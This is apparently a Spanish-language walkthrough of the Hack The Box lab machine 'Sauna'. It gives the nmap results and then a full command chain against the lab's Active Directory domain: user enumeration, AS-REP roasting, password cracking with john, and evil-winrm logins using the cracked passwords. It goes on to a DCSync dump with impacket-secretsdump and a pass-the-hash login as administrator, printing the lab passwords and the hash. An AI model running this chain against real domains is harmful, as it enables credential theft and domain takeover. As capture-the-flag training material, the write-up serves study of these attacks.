Sauna

https://app.hackthebox.com/machines/Sauna

Reconocimiento

# Nmap 7.94SVN scan initiated Tue Oct  1 16:12:28 2024 as: nmap -p135,139,3268,3269,389,445,464,49667,49673,49674,49677,49689,49696,53,593,5985,636,80,88,9389 -sCV -T5 -oN Targeted 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.17s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-01 21:12:38Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m02s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-10-01T21:13:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct  1 16:14:09 2024 -- 1 IP address (1 host up) scanned in 101.12 seconds

Explotación

Empezando por la enumeración de los puertos para poder encontrar información y posteriormente una explotación, en el puerto 53 domain he encontrado con el siguiente comando un potencial usuario en el active directory:

ldapsearch -x -H ldap://10.10.10.175 -b "DC=EGOTISTICAL-BANK,DC=LOCAL" | grep "dn:"

al encontrar nombre, las fomras comunes de representar usuarios en un active directory es le siguiente:

hugosmith
hsmith
hugo.smith
h.smith

Esta lista vamos a pasarla por kerbrute y vamos a comprobar si el usuario existe en el Active Directory

Al parecer kerbrute nos da el usuario como valido así que ahora sabemos tanto un usuario de el AD como la sintaxis que utilizan los usuarios, vamos a seguir enumerando.

Dentro de la páguina web hemos encontrado mas trabajadores, los cuales vamos a comprobar si son validos en el AD:

Vamos a ejecutar el siguiente comando para verificar si alguno de los usuarios es vulnerable a AS-REP Roasting:

impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -no-pass -usersfile users.txt 2>/dev/null  

# Dentro de users.txt:
hsmith
fsmith 
scoins
sdriver 
btaylor 
hbear 
skerb

Como podmeos ver en la siguiente imagen encontramos que el usuario fsmith es vulnerable, vamos a coger su hash y vamos a crackearlo con john:

Metemos el hash dentro de el archivo hash y ejecutamos el siguiente comando:

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Nos reporta la contraseña en texto claro "Thestrokes23", junto con esta contraseña vamos a conectarnos por el puerto 5985 con evil-winrm:

evil-winrm -i 10.10.10.175 -u "fsmith" -p "Thestrokes23"

Escalada de Privilegios

Para hacer la escalada de privilegios vamos a utilizar una utilidad llamada WinPEAS.exe

https://github.com/carlospolop/PEASS-ng/releases/download/20230101/winPEASx64.exe

Dentro de el output de WinPEAS.exe encontramos la contraseña Moneymakestheworldgoround! para el usuario svc_loanmgr nos conectamos con evil-winrm

evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'

Una vez dentro nos descargamos SharpHound.ps1 lo ejecutamos y pasamos a nuestra máquina el .zip

1 -> wget https://raw.githubusercontent.com/puckiestyle/powershell/refs/heads/master/SharpHound.ps1
2 -> (Máquina víctima)
upload SharpHound.ps1
powershell
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All
download 20241004152105_BloodHound.zip 

Una vez que el archivo .zip ha sido subido a BloodHound, el primer paso es identificar y marcar los usuarios comprometidos. A continuación, navegamos a la sección "Find Principals with DCSync Rights", donde descubrimos que el usuario svc_loanmgr tiene asignados los permisos Get Changes y Get Changes All sobre el dominio. Estos permisos indican que el usuario es vulnerable al ataque DCSync, que permite replicar los hashes de contraseñas del controlador de dominio sin necesidad de comprometer directamente el controlador.

Sabiendo esto ejecutamos el ataque DCSync de la siguiente manera:

impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175

Una vez con este hash podemos entrar como el usuario administrador y conseguir la flag de root.txt.

evil-winrm -i 10.10.10.175 -u 'administrator' -H "823452073d75b9d1cf70ebdf86c7f98e"